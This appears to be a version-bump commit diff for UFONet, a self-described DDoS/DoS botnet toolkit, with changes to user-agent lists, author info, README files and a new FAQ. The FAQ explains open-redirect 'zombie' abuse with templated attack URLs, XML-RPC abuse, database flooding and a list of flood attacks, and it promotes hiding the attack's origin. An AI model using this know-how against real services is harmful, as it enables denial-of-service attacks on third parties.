 Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7412.EU
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Mozilla/5.0 (X11; Linux i686; rv:89.0) Gecko/20100101 Firefox/89.0
+Mozilla/5.0 (Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
+Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:89.0) Gecko/20100101 Firefox/89.0
+Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
+Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15
+Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Mobile/15E148 Safari/604.1
+Mozilla/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Mobile/15E148 Safari/604.1
+Mozilla/5.0 (iPod touch; CPU iPhone 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Mobile/15E148 Safari/604.1
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.59
+Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.59
+Mozilla/5.0 (Linux; Android 10; HD1913) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36 EdgA/46.3.4.5155
+Mozilla/5.0 (Linux; Android 10; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36 EdgA/46.3.4.5155
+Mozilla/5.0 (Linux; Android 10; Pixel 3 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36 EdgA/46.3.4.5155
+Mozilla/5.0 (Linux; Android 10; ONEPLUS A6003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36 EdgA/46.3.4.5155
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203
+Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203
+Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203
+Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 YaBrowser/21.6.0 Yowser/2.5 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 YaBrowser/21.6.0 Yowser/2.5 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 YaBrowser/21.6.0 Yowser/2.5 Safari/537.36
+Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 YaBrowser/21.5.6.744 Mobile/15E148 Safari/604.1
+Mozilla/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 YaBrowser/21.5.6.744 Mobile/15E148 Safari/605.1
+Mozilla/5.0 (iPod touch; CPU iPhone 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 YaBrowser/21.5.6.744 Mobile/15E148 Safari/605.1

File diff suppressed because it is too large
+ 577 - 167
core/webgui.py


+ 0 - 0
data/tv.txt


+ 34 - 53
docs/AUTHOR

@@ -1,54 +1,35 @@
-========================
 
- nick: psy (epsylon)
-  
-  <epsylon@riseup.net> 
-
- web: https://03c8.net
-
-=======================
-
- code:
-
- - https://code.03c8.net/epsylon
- - https://github.com/epsylon
-
-=======================
-
- software/projects:
-
- - Anarcha-Pragmatism: Intellectual model (and movement) based on the culture of the "action/reaction".
- - AnonTwi: Tool for OAuth2 applications (such as: GNUSocial, Twitter) that provides different layers of privacy/encryption.
- - BrAInStocker: Tool to predict (using Linear Regression) the next number within a series of random numbers.
- - Bordercheck: Tool to visualize 'real-time' on a world map the geolocation of data when surfing the web.
- - CIntruder: Tool to bypass captchas using OCR (Optical Character Recognition) bruteforcing methods.
- - Collatz: Tool to simulate the Collatz's conjeture.
- - DiaNA: Tool for the search and recognition of patterns in DNA sequences.
- - DieKunstDerFuge: Video on different topics related to hacktivism recorded during 2013 from an intimate narrative perspective.
- - ECOin: Decentralized key/value registration and transfer system based on Bitcoin technology (a cryptocurrency).
- - Euler-Bricks: Tool to search for Euler's "bricks".
- - Goldbach: Tool to simulate the Goldbach's conjeture.
- - Lorea: Social networking autonomous project to build a distributed, encrypted and federated network.
- - Neuralia: Neural Network that tries to learn and reply the correct answer.
- - NoINIW-2051: Shell-based CyberPunk m-RPG videogame.
- - Orb: Tool for massive footprinting.
- - PandeMaths: Tool that simulates a mathematical model of pandemics.
- - pArAnoIA-Browser: Tool designed to surf the Internet using some "paranoic" methods.
- - Propagare: Tool for extraction, organization and semantic analysis of newspapers.
- - PyAISnake: Tool to train AI models on solve spatial problems through the classic video game "snake".
- - PyDog4Apache: Tool to sneak logs from Apache web server.
- - Smuggler: Tool to detect and exploit HTTP Smuggling vulnerabilities.
- - UFONet: Denial of Service [DDoS & DoS attacks] Toolkit (a botnet of botnets).
- - XSSer: Automatic -framework- to detect, exploit and report XSS vulnerabilities.
-
-=======================
-
- bitcoin (BTC): 
-
- - 19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw
-
- ecoin (ECO):
-
- - ETsRCBzaMawx3isvb5svX7tAukLdUFHKze
-
-========================
+- NICKNAME: <a href="https://03c8.net/chess.php" target="_blank">psy</a> (epsylon) (<a href="https://03c8.net" target="_blank">https://03c8.net</a>) | CODE: <a href="https://code.03c8.net/epsylon" target="_blank">code.03c8.net/epsylon</a> | MIRROR: <a href="https://github.com/epsylon" target="_blank">github.com/epsylon</a>
+
+<hr>
+- PROJECTS:
+
+  - <a href="https://03c8.net/projects/system/index.php/Anarcho-pragmatism" target="_blank">Anarcha-Pragmatism</a>: Intellectual model (and movement) based on the culture of the "action/reaction".
+  - <a href="https://anontwi.03c8.net" target="_blank">AnonTwi</a>: Tool for OAuth2 applications (such as: GNUSocial, Twitter) that provides different layers of privacy/encryption.
+  - <a href="https://github.com/epsylon/Brainstocker" target="_blank">BrAInStocker</a>: Tool to predict (using Linear Regression) the next number within a series of random numbers.
+  - <a href="https://github.com/epsylon/Border-Check" target="_blank">Bordercheck</a></b>: Tool to visualize 'real-time' on a world map the geolocation of data when surfing the web.
+  - <a href="https://cintruder.03c8.net" target="_blank">CIntruder</a></b>: Tool to bypass captchas using OCR (Optical Character Recognition) bruteforcing methods.
+  - <a href="https://github.com/epsylon/collatz" target="_blank">Collatz</a></b>: Tool to simulate the Collatz's conjeture.
+  - <a href="https://github.com/epsylon/DiaNA" target="_blank">DiaNA</a></b>: Tool for the search and recognition of patterns in DNA sequences.
+  - <a href="dkdf.php" target="_blank">DieKunstDerFuge</a></b>: Video on different topics related to hacktivism recorded during 2013 from an intimate narrative perspective.
+  - <a href="https://ecoin.03c8.net" target="_blank">ECOin</a></b>: Crypto-currency with the goal of providing a long-term energy-efficient digital economy strategy.
+  - <a href="https://github.com/epsylon/euler-bricks" target="_blank">Euler-Bricks</a></b>: Tool to simulate the Euler's conjeture.
+  - <a href="https://github.com/epsylon/goldbach" target="_blank">Goldbach</a></b>: Tool to simulate the Goldbach's conjeture.
+  - <a href="https://github.com/epsylon/Elgg-Lorea-Hydra" target="_blank">Lorea</a></b>: Social networking autonomous project to build a distributed, encrypted and federated network.
+  - <a href="https://github.com/epsylon/neuralia" target="_blank">Neuralia</a></b>: Neural Network that tries to learn and reply the correct answer.
+  - <a href="https://github.com/epsylon/NoINIW2051" target="_blank">NoINIW-2051</a></b>: Shell-based CyberPunk m-RPG videogame.
+  - <a href="https://orb.03c8.net" target="_blank">Orb</a></b>: Tool for massive footprinting.
+  - <a href="https://github.com/epsylon/pandemaths" target="_blank">PandeMaths</a></b>: Tool that simulates a mathematical model of pandemics.
+  - <a href="https://browser.03c8.net" target="_blank">pArAnoIA-Browser</a></b>: Tool designed to surf the Internet using some "paranoic" methods.
+  - <a href="https://github.com/epsylon/propagare" target="_blank">Propagare</a></b>: Tool for extraction, organization and semantic analysis of newspapers.
+  - <a href="https://github.com/epsylon/PyAISnake" target="_blank">PyAISnake</a></b>: Tool to train AI models on solve spatial problems through the classic video game "snake".
+  - <a href="https://pydog4apache.03c8.net" target="_blank">PyDog4Apache</a></b>: Tool to sneak logs from Apache web server.
+  - <a href="https://github.com/epsylon/Smuggler" target="_blank">Smuggler</a></b>: Tool to detect and exploit HTTP Smuggling vulnerabilities.
+  - <a href="https://ufonet.03c8.net" target="_blank">UFONet</a></b>: Denial of Service [DDoS & DoS attacks] Toolkit (a botnet of botnets).
+  - <a href="https://xsser.03c8.net" target="_blank">XSSer</a></b>: Automatic -framework- to detect, exploit and report XSS vulnerabilities.
+
+<hr>
+- DONATIONS:
+
+  - <a href="https://explorer.bitcoin.com/btc" target="_blank">Bitcoin [BTC]</a>: <b>19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw</b>
+  - <a href="https://ecoin.03c8.net/blockexplorer" target="_blank">Ecoin [ECO]</a>: <b>ETsRCBzaMawx3isvb5svX7tAukLdUFHKze</b>

+ 129 - 0
docs/FAQ.html

@@ -0,0 +1,129 @@
+<center>
+<table cellpadding="24" cellspacing="25" border="1">
+<tr><td><pre><table><tr><td><center><pre><h1><u>UFONet F.A.Q. v1.7 [Revision: 07/2021]</u></h1>Full Version (updated!) online: <a href="https://ufonet.03c8.net/FAQ.html">https://ufonet.03c8.net/FAQ.html</a><a href="/"></center></td></tr><tr><td><pre><ul><hr>
+<li><b>What is UFONet?</b></li>
+It is a toolkit designed to launch <a href="https://en.wikipedia.org/wiki/Distributed_denial-of-service" target="_blank">DDoS</a> and <a href="https://en.wikipedia.org/wiki/Denial-of-service_attack" target="_blank">DoS</a> attacks.
+
+<hr>
+<li><b>What is a DDoS attack?</b></li>
+A Distributed Denial of Service (<a href="https://en.wikipedia.org/wiki/Distributed_denial-of-service" target="_blank">DDoS</a>) <u>attack</u> is an attempt to make an online service 
+unavailable by overwhelming it (for example, with traffic...) <u>from multiple sources</u>.
+
+<hr> 
+<li><b>What is a DoS attack?</b></li>
+A Denial of Service (<a href="https://en.wikipedia.org/wiki/Denial-of-service_attack" target="_blank">DoS</a>) <u>attack</u> is an attempt to make an online service 
+unavailable by overwhelming it (for example, with traffic...) <u>from a single source</u>.
+
+<hr>
+<li><b>What is a Botnet?</b></li>
+A <a href="https://en.wikipedia.org/wiki/Botnet" target="_blank">Botnet</a> is a collection of computers often referred to as "zombies" that allows an attacker
+to control them. It is commonly used to make DDoS attacks.
+
+<hr>
+<li><b>What is the philosophy behind UFONet?</b></li>
+<i>"On a samurai sword or even any tool, what matters is who goes to use it and for what, 
+not who builds it and when..."</i>
+
+<hr>
+<li><b>Why can UFONet be more special, than for example, other botnets previously built?</b></li>
+Because UFONet tries not living traces (IPs, etc...) from the origin of the attack. And
+of course, because <b><u>it is free/libre</u></b>. ;-)
+
+<hr>
+<li><b>How does UFONet work technically?</b></li>
+<a href="http://ufonet.03c8.net" target="_blank">UFONet</a> is a tool designed to launch <a href="https://en.wikipedia.org/wiki/OSI_model#Layer_7:_Application_Layer" target="_blank">Layer 7</a> (APP/HTTP) DDoS attacks, using '<a href="http://cwe.mitre.org/data/definitions/601.html" target="_blank">Open Redirect</a>'
+vectors, generally located on third-party web applications (a botnet) and other
+powerful DoS attacks, some including different <a href="https://en.wikipedia.org/wiki/OSI_model" target="_blank">OSI model</a> layers, as for example
+the <i>TCP/SYN flood attack</i>, which is performed on <a href="https://en.wikipedia.org/wiki/OSI_model#Layer_3:_Network_Layer" target="_blank">Layer 3</a> (Network).
+
+This <a href="https://ufonet.03c8.net/ufonet/ufonet-schema.png" target="_blank">schema</a> shows you how the architecture of the requests are made when performing
+a simple HTTP/WebAbuse DDoS attack.
+
+<hr>
+<li><b>Is UFONet a "strong" botnet?</b></li>
+Well!. It depends on how you understand a botnet as "strong". If you understand it as;
+
+ *  '<u>privacy</u>'; UFONet is the best -ninja- DDoS/DoS tool...
+ *  '<u>traffic volume</u>'; it depends on; 'zombies', bandwidth, target's conf, etc...
+
+With UFONet it's not about having a lot of 'zombies', it's more about those you have
+work properly. If they are nice, you can 'defeat' a 'small' webserver just with
+a 'couple of dozens'.
+
+Or for example, in a scenario in which a target is using a VPS service with some limited
+bandwidth rate (ex: 1GB/month) for the attacker is just a matter of time to run the tool
+and wait until traffic (noise) reaches the maximum limit that closes the service.
+
+Commonly people understand a botnet as an individual tool but UFONet is also a <a href="https://en.wikipedia.org/wiki/Peer-to-peer" target="_blank">P2P</a>/<a href="https://en.wikipedia.org/wiki/Darknet" target="_blank">darknet</a>,
+that can be used to connect others machines and to run complex schemas involving other people 
+working cooperatively: sharing 'zombies', reporting statistics (with rankings, clans)...
+
+Therefore, UFONet can also be defined fundamentally, as: <b>a botnet of botnets</b>, which is 
+obviously a harder and effective way to overwhelm an objective, than when a single person 
+tries it individually.
+
+<hr>
+<li><b>What's the difference between: 'zombies', 'aliens', 'droids', 'ucavs'...?</b></li>
+ * <u>Zombie</u>: HTTP GET 'Open Redirect' bot
+
+ ex: https://ZOMBIE.com/check?uri=$TARGET
+
+ * <u>Droid</u>: HTTP GET 'Open Redirect' bot with params
+
+ ex: https://ZOMBIE.COM/css-validator/validator?uri=$TARGET&profile=css3
+
+ * <u>Alien</u>: HTTP POST 'Open Redirect' bot
+
+ ex: https://ZOMBIE.com/analyze.html;$POST;url=$TARGET
+
+ * <u>Drone</u>: HTTP 'Web Abuse' bot
+
+ ex: https://www.isup.me/$TARGET
+
+ * <u>X-RPC</u>: XML-RPC Vulnerability
+
+ ex: https://ZOMBIE.COM/xmlrpc.php
+
+<hr> 
+<li><b>Is it possible to stress target's database using UFONet?</b></li>
+Yes, it is. For example, you can order to your 'zombies' to submit random valid requests 
+on a target's search input form. This floods database with queries.
+
+<hr>
+<li><b>Can I directly attack an IP address?</b></li>
+Yes, you can.
+
+<hr>
+<li><b>What kind of extra attacks does the tool have?</b></li><pre>
+ - LOIC: <a href="https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon" target="_blank">https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon</a>
+ - LORIS: <a href="https://en.wikipedia.org/wiki/Slowloris_(software)" target="_blank">https://en.wikipedia.org/wiki/Slowloris_(software)</a>
+ - UFOSYN: <a href="https://en.wikipedia.org/wiki/SYN_flood" target="_blank">https://en.wikipedia.org/wiki/SYN_flood</a>
+ - FRAGGLE: <a href="https://en.wikipedia.org/wiki/Fraggle_attack" target="_blank">https://en.wikipedia.org/wiki/Fraggle_attack</a>
+ - UFORST: <a href="https://ddos-guard.net/en/terminology/attack_type/rst-or-fin-flood" target="_blank">https://ddos-guard.net/en/terminology/attack_type/rst-or-fin-flood</a>
+ - SPRAY: <a href="https://en.wikipedia.org/wiki/DRDOS" target="_blank">https://en.wikipedia.org/wiki/DRDOS</a>
+ - SMURF: <a href="https://en.wikipedia.org/wiki/Smurf_attack" target="_blank">https://en.wikipedia.org/wiki/Smurf_attack</a>
+ - XMAS: <a href="https://en.wikipedia.org/wiki/Christmas_tree_packet" target="_blank">https://en.wikipedia.org/wiki/Christmas_tree_packet</a>
+ - DROPER: <a href="https://en.wikipedia.org/wiki/IP_fragmentation_attack" target="_blank">https://en.wikipedia.org/wiki/IP_fragmentation_attack</a>
+ - SNIPER: <a href="https://www.imperva.com/learn/application-security/snmp-reflection/" target="_blank">https://www.imperva.com/learn/application-security/snmp-reflection/</a>
+ - TACHYON: <a href="https://www.us-cert.gov/ncas/alerts/TA13-088A" target="_blank">https://www.us-cert.gov/ncas/alerts/TA13-088A</a>
+ - PINGER: <a href="https://www.cloudflare.com/learning/ddos/ping-icmp-flood-ddos-attack/" target="_blank">https://www.cloudflare.com/learning/ddos/ping-icmp-flood-ddos-attack/</a>
+ - MONLIST: <a href="https://www.us-cert.gov/ncas/alerts/TA14-013A" target="_blank">https://www.us-cert.gov/ncas/alerts/TA14-013A</a>
+ - UFOACK: <a href="https://www.f5.com/services/resources/glossary/push-and-ack-flood" target="_blank">https://www.f5.com/services/resources/glossary/push-and-ack-flood</a>
+ - OVERLAP: <a href="https://cyberhoot.com/cybrary/fragment-overlap-attack/" target="_blank">https://cyberhoot.com/cybrary/fragment-overlap-attack/</a>
+ - UFOUDP: <a href="https://en.wikipedia.org/wiki/UDP_flood_attack" target="_blank">https://en.wikipedia.org/wiki/UDP_flood_attack</a>
+ - NUKE: <a href="https://dl.packetstormsecurity.net/papers/general/tcp-starvation.pdf" target="_blank">https://dl.packetstormsecurity.net/papers/general/tcp-starvation.pdf</a></pre>
+<hr>
+<li><b>What is a 'wormhole'?</b></li>
+It is an <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat" target="_blank">IRC</a> gateway to <a href="https://en.wikipedia.org/wiki/Freenode" target="_blank">Freenode</a> where UFONet 'masters' can meet.
+
+<hr>
+<li><b>What is a 'blackhole'?</b></li>
+It is a <a href="https://en.wikipedia.org/wiki/Peer-to-peer" target="_blank">P2P</a> daemon to share 'zombies' with other UFONet 'masters'.
+
+<hr>
+<li><b>Where can I report a bug?</b></li>
+You can report errors on: <a href="https://github.com/epsylon/ufonet/issues" target="_blank">Github issues</a>.
+
+Also you can stay in touch reporting on my "mothership" (using BOARD provided by default).
+  
+If nobody gets back to you, then drop me an <a href="mailto: epsylon@riseup.net">e-mail</a>.</ul></pre></td></tr></table></pre></td></tr></table></center>

+ 25 - 23
docs/LEEME.txt

@@ -37,15 +37,12 @@ Bienvenida a UFONet [ DDoS+DoS ] Botnet/C&C/Darknet ;-)
 # Introducción
 ###############################
 
-UFONet - es un conjunto de herramientas diseñado para lanzar ataques DDoS y DoS.
+UFONet -  Es un conjunto de herramientas hacktivistas que permiten el lanzamiento coordinado
+          de ataques DDoS y DoS, permitiendo combinar ambas técnicas en una sola ofensiva.
 
-En los siguientes enlaces tienes más información:
-
-   - CWE-601:Open Redirect: 
-     https://cwe.mitre.org/data/definitions/601.html
-
-   - OWASP:URL Redirector Abuse: 
-     https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
+          También funciona como un DarkNET cifrada para publicar y recibir contenido 
+          mediante la creación de una red global de cliente/servidor basada en una 
+          arquitectura P2P de conexión directa. 
 
 ###############################
 # Instalando
@@ -122,9 +119,9 @@ Por defecto, UFONet utiliza un motor de búsqueda que se llama 'DuckDuckGo'. Per
 
 Ésta es la lista de motores de búsqueda que funcionan con la fecha de la última vez que se han probado:
 
-        - duckduckgo  [01/02/2020: OK!]
-        - bing        [01/02/2020: OK!]
-        - yahoo       [01/02/2020: OK!]
+        - duckduckgo  [13/07/2021: OK!]
+        - bing        [13/07/2021: OK!]
+        - yahoo       [13/07/2021: OK!]
 
 También puedes buscar masívamente utilizando todos los motores de búsqueda soportados:
 
@@ -423,25 +420,30 @@ Para lanzarla usa:
 Ésto abrirá una pestaña (o una ventana nueva) en tu navegador por defecto, con todas las opciones de la herramienta 
 más algunas "extra":
 
- - NEWS: Permite leer las últimas "noticias" publicadas por la "nave madre"
- - MISSIONS: Permite leer las últimas "misiones" publicadas por la "nave madre"
- - SHIP STATS: Permite consultar las estadísticas de tu "nave"
- - RANKING: Permite consultar tu posición en el "ranking"
- - BOARD: Permite enviar/recibir mensajes con una "nave madre" (un foro)
- - SHIP LINKS: Permite revisar los enlaces publicados por otras "naves"
- - SHIP STREAMS: Permite revisar los "streams" (video/audio/directo) publicados por otras "naves"
+ - SHIP.NEWS: Permite leer las últimas "noticias" publicadas por la "nave madre"
+ - SHIP.MISSIONS: Permite leer las últimas "misiones" publicadas por la "nave madre"
+ - SHIP.STATS: Permite consultar las estadísticas de tu "nave"
+ - SHIP.RANKING: Permite consultar tu posición en el "ranking"
+ - SHIP.LINKS: Permite revisar los enlaces publicados por otras "naves"
+ - SHIP.STREAMS: Permite revisar los "streams" (video/audio/directo) publicados por otras "naves"
+ - SHIP.TV: Permite ver videos publicados por otras "naves"
  - SHIP GAMES: Permite revisar los "juegos" que contiene tu "nave madre"
- - BROWSER: Permite navegar/surfear la Internet
- - GLOBAL.NET: Permite revisar las localizaciones publicadas por otras "naves"
- - WARPS: Permite interactuar con una "nave madre" para subir/bajar 'zombies'
- - GLOBAL GRID: Permite revisar las estadísticas de otras "naves"
- - WARGAMES: Permite proponer y participar en algunos "juegos de guerra" reales
+ - SHIP.BROWSER: Permite navegar/surfear la Internet
+ - SHIP.WARPS: Permite interactuar con una "nave madre" para subir/bajar 'zombies'
+ - GLOBAL.BOARD: Permite enviar/recibir mensajes con una "nave madre" (un foro)
+ - GLOBAL.GRID: Permite revisar las estadísticas de otras "naves"
+ - GLOBAL.WARGAMES: Permite proponer y participar en algunos "juegos de guerra" reales
+ - GLOBAL.RADAR: Permite revisar las localizaciones publicadas por otras "naves"
  - [...]
 
 ###############################
 # Timelog
 ###############################
 
+--------------------------
+14.07.2021 : v.1.7
+--------------------------
+
 --------------------------
 17.08.2020 : v.1.6
 --------------------------

+ 26 - 24
docs/README.txt

@@ -37,15 +37,12 @@ Welcome to UFONet [ DDoS+DoS ] Botnet/C&C/Darknet ;-)
 # Summary
 ###############################
 
-UFONet - is a toolkit designed to launch DDoS and DoS attacks.
+UFONet - Is a set of hacktivist tools that allow launching coordinated 
+         DDoS and DoS attacks and combine both in a single offensive.
 
-See these links for more info:
-
-   - CWE-601:Open Redirect: 
-     https://cwe.mitre.org/data/definitions/601.html
-
-   - OWASP:URL Redirector Abuse: 
-     https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
+         It also works as an encrypted DarkNET to publish and receive
+         content by creating a global client/server network based on 
+         a direct-connect P2P architecture.
 
 ###############################
 # Installing
@@ -121,9 +118,9 @@ By default UFONet will use a search engine called 'DuckDuckGo'. But you can choo
 
 This is the list of available search engines with last time that they were working:
 
-        - duckduckgo [01/02/2020: OK!]
-        - bing       [01/02/2020: OK!]
-        - yahoo      [01/02/2020: OK!]
+        - duckduckgo  [13/07/2021: OK!]
+        - bing        [13/07/2021: OK!]
+        - yahoo       [13/07/2021: OK!]
 
 You can also search massively using all search engines supported:
 
@@ -417,25 +414,30 @@ To launch it use:
 
 This will open a tab on your default browser with all features of the tool and some 'extra' options:
 
- - NEWS: Allows to read last "news" published by a "mothership"
- - MISSIONS: Allows to read last "missions" published by a "mothership"
- - SHIP STATS: Allows to review statistics from your "spaceship"
- - RANKING: Allows to check your "ranking" position
- - BOARD: Allows to send/receive messages to/from a "mothership" (a forum)
- - SHIP LINKS: Allows to review links published by a "mothership"
- - SHIP STREAMS: Allows to review streams (video/audio/live) published by a "mothership"
- - SHIP GAMES: Allows to review games from your "spaceship"
- - BROWSER: Allows to navigate/surf the Internet from a sandbox
- - GLOBAL.NET: Allows to review locations published by other "motherships"
- - WARPS: Allows to interact with a "mothership" to download/upload "zombies"
- - GLOBAL GRID: Allows to review statistics from other "spaceships"
- - WARGAMES: Allows to propose and join some real "wargames"
+ - SHIP.NEWS: Allows to read last "news" published by a "mothership"
+ - SHIP.MISSIONS: Allows to read last "missions" published by a "mothership"
+ - SHIP.STATS: Allows to review statistics from your "spaceship"
+ - SHIP.RANKING: Allows to check your "ranking" position
+ - SHIP.LINKS: Allows to review links published by a "mothership"
+ - SHIP.STREAMS: Allows to review streams (video/audio/live) published by a "mothership"
+ - SHIP.TV: Allows to play videos published by a "mothership"
+ - SHIP.GAMES: Allows to review games from your "spaceship"
+ - SHIP.BROWSER: Allows to navigate/surf the Internet from a sandbox
+ - SHIP.WARPS: Allows to interact with a "mothership" to download/upload "zombies"
+ - GLOBAL.BOARD: Allows to send/receive messages to/from a "mothership" (a forum)
+ - GLOBAL.GRID: Allows to review statistics from other "spaceships"
+ - GLOBAL.WARGAMES: Allows to propose and join some real "wargames"
+ - GLOBAL.RADAR: Allows to review locations published by other "motherships"
  - [...]
 
 ###############################
 # Timelog
 ###############################
 
+--------------------------
+14.07.2021 : v.1.7
+--------------------------
+
 --------------------------
 17.08.2020 : v.1.6
 --------------------------

+ 1 - 1
docs/README_grider.txt

@@ -4,7 +4,7 @@ How to set up a 'grider' - eg a P2P/Community stats/board server
 
 * Setup web server (apache, nginx...) with a folder "ufonet", this folder should be:
   - Located in: /var/www/ufonet
-  - Owned by the user running the blackhole
+  - Owned by the user running the grider
   - Accessible with: http(s)://<your ip>/ufonet/
 
 * Start the grider with: 

+ 1 - 0
docs/VERSION

@@ -17,3 +17,4 @@ Date	    Size     Version    Alias
 2020-02-01   25.0Mb   1.4       T!M3-WaRS           
 2020-06-08   27.2Mb   1.5       MuLTi.V3rSe!        
 2020-08-17   27.4Mb   1.6       M4RAuD3R!           
+2021-07-14   27.0Mb   1.7       /KRäK!eN/           

+ 1 - 1
docs/release.date

@@ -1 +1 @@
-Mon Aug  17 22:00:02 2020
+Wen Jul 14 07:00:04 2021

+ 2 - 2
setup.py

@@ -3,7 +3,7 @@
 """
 This file is part of the UFONet project, https://ufonet.03c8.net
 
-Copyright (c) 2013/2020 | psy <epsylon@riseup.net>
+Copyright (c) 2013/2021 | psy <epsylon@riseup.net>
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
@@ -18,7 +18,7 @@ from setuptools import setup, find_packages
 
 setup(
     name='ufonet',
-    version='1.6',
+    version='1.7',
     license='GPLv3',
     author_email='epsylon@riseup.net',
     author='psy',

+ 1 - 1
ufonet

@@ -1,7 +1,7 @@
 #!/usr/bin/env python 
 # -*- coding: utf-8 -*-"
 """
-UFONet - Denial of Service Toolkit - 2013/2019 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2021 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51